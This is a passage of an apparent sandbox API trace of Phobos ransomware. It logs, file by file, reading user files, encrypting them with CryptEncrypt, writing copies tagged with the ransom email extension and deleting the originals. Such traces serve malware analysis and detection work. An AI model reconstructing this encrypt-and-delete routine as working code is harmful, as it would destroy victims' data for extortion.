[0194.751] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.752] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0194.752] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.752] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1c000, lpOverlapped=0x0) returned 1 [0194.790] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1c010, dwBufLen=0x1c010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1c010) returned 1 [0194.791] WriteFile (in: hFile=0x154, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1c010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1c010, lpOverlapped=0x0) returned 1 [0194.793] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0194.793] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.793] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0194.793] CryptDestroyKey (hKey=0xa32de8) returned 1 [0194.793] WriteFile (in: hFile=0x154, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0194.793] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.793] CloseHandle (hObject=0x180) returned 1 [0194.793] CloseHandle (hObject=0x154) returned 1 [0194.793] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\index.dat")) returned 1 [0194.795] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.796] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=432) returned 1 [0194.796] CloseHandle (hObject=0x154) returned 1 [0194.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini")) returned 0x6 [0194.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.797] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.797] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.797] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0194.797] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.797] ReadFile (in: hFile=0x154, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1b0, lpOverlapped=0x0) returned 1 [0194.798] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1c0, dwBufLen=0x1c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1c0) returned 1 [0194.798] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1c0, lpOverlapped=0x0) returned 1 [0194.799] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0194.799] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.799] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0194.799] CryptDestroyKey (hKey=0xa32de8) returned 1 [0194.799] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0194.799] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.799] CloseHandle (hObject=0x154) returned 1 [0194.799] CloseHandle (hObject=0x180) returned 1 [0194.799] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini")) returned 1 [0194.800] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.904] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=558) returned 1 [0194.904] CloseHandle (hObject=0x134) returned 1 [0194.904] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini")) returned 0x2026 [0194.904] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.905] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.905] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.946] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0194.946] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.946] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x22e, lpOverlapped=0x0) returned 1 [0194.947] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x230, dwBufLen=0x230 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x230) returned 1 [0194.947] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x230, lpOverlapped=0x0) returned 1 [0194.948] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0194.948] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.948] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0194.948] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.948] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0194.948] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.948] CloseHandle (hObject=0x134) returned 1 [0194.948] CloseHandle (hObject=0x180) returned 1 [0194.949] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini")) returned 1 [0194.949] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.951] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=3035) returned 1 [0194.951] CloseHandle (hObject=0x180) returned 1 [0194.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json")) returned 0x2020 [0194.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.951] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.951] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.952] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0194.952] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.952] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xbdb, lpOverlapped=0x0) returned 1 [0195.061] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xbe0, dwBufLen=0xbe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xbe0) returned 1 [0195.061] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xbe0, lpOverlapped=0x0) returned 1 [0195.062] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0195.062] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.062] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0195.062] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.062] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0195.062] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.062] CloseHandle (hObject=0x180) returned 1 [0195.062] CloseHandle (hObject=0x134) returned 1 [0195.062] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json")) returned 1 [0195.063] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.064] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=3035) returned 1 [0195.065] CloseHandle (hObject=0x134) returned 1 [0195.065] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json")) returned 0x2020 [0195.065] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.065] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.065] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.066] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0195.066] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.066] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xbdb, lpOverlapped=0x0) returned 1 [0195.122] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xbe0, dwBufLen=0xbe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xbe0) returned 1 [0195.122] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xbe0, lpOverlapped=0x0) returned 1 [0195.124] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0195.124] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.124] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0195.124] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.124] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0195.124] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.124] CloseHandle (hObject=0x134) returned 1 [0195.124] CloseHandle (hObject=0x180) returned 1 [0195.124] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json")) returned 1 [0195.125] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.127] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=65536) returned 1 [0195.127] CloseHandle (hObject=0x180) returned 1 [0195.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db")) returned 0x2020 [0195.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 